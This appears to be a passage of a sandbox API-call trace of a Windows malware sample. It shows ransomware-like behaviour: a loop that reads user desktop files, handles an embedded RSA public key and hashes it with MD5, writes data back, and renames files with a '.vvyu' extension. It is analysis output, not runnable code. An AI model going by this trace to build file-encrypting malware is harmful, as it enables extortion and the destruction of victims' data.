lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b8 | out: hHeap=0x6a0000) returned 1 [0183.295] GetCurrentThreadId () returned 0x264 [0183.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce020 [0183.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.296] GetCurrentThreadId () returned 0x264 [0183.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e690 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e738 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e750 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6a8 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e678 [0183.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3a1b8 [0183.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3a3c8 [0183.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d3a5e0 [0183.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c8 | out: hHeap=0x6a0000) returned 1 [0183.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5e0 | out: hHeap=0x6a0000) returned 1 [0183.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30880 | out: hHeap=0x6a0000) returned 1 [0183.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b8 | out: hHeap=0x6a0000) returned 1 [0183.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.306] WriteFile (in: hFile=0x584, lpBuffer=0x2d36670*, nNumberOfBytesToWrite=0x3b36, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d36670*, lpNumberOfBytesWritten=0x30ffb14*=0x3b36, lpOverlapped=0x0) returned 1 [0183.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.307] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3b3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.307] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d36670 [0183.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d36670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d36aa0 [0183.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.308] WriteFile (in: hFile=0x584, lpBuffer=0x2d36aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d36aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36aa0 | out: hHeap=0x6a0000) returned 1 [0183.308] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.309] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.309] CloseHandle (hObject=0x584) returned 1 [0183.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d36670 [0183.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.310] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\7rMc5PE99.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\7rmc5pe99.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\7rMc5PE99.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\7rmc5pe99.bmp.vvyu")) returned 1 [0183.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.322] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.325] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f5fb10, ftCreationTime.dwHighDateTime=0x1d89ed0, ftLastAccessTime.dwLowDateTime=0x7e7e8830, ftLastAccessTime.dwHighDateTime=0x1d8a273, ftLastWriteTime.dwLowDateTime=0x7e7e8830, ftLastWriteTime.dwHighDateTime=0x1d8a273, nFileSizeHigh=0x0, nFileSizeLow=0xa585, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9ji3dkVzY.avi", cAlternateFileName="9JI3DK~1.AVI")) returned 1 [0183.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30880 [0183.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30880 | out: hHeap=0x6a0000) returned 1 [0183.325] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\9ji3dkVzY.avi") returned=".avi" [0183.325] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\9ji3dkVzY.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\9ji3dkvzy.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.326] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=42373) returned 1 [0183.326] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.329] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa55f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.329] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.330] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.330] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xa585, lpOverlapped=0x0) returned 1 [0183.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.331] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.332] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.332] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.332] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.332] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.332] GetLastError () returned 0x0 [0183.332] SetLastError (dwErrCode=0x0) [0183.332] GetLastError () returned 0x0 [0183.332] SetLastError (dwErrCode=0x0) [0183.332] GetLastError () returned 0x0 [0183.332] SetLastError (dwErrCode=0x0) [0183.332] GetLastError () returned 0x0 [0183.332] SetLastError (dwErrCode=0x0) [0183.332] GetLastError () returned 0x0 [0183.332] SetLastError (dwErrCode=0x0) [0183.332] GetLastError () returned 0x0 [0183.332] SetLastError (dwErrCode=0x0) [0183.332] GetLastError () returned 0x0 [0183.332] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.333] SetLastError (dwErrCode=0x0) [0183.333] GetLastError () returned 0x0 [0183.334] SetLastError (dwErrCode=0x0) [0183.334] GetLastError () returned 0x0 [0183.334] SetLastError (dwErrCode=0x0) [0183.334] GetLastError () returned 0x0 [0183.334] SetLastError (dwErrCode=0x0) [0183.334] GetLastError () returned 0x0 [0183.334] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.334] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.334] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.334] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.334] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.335] 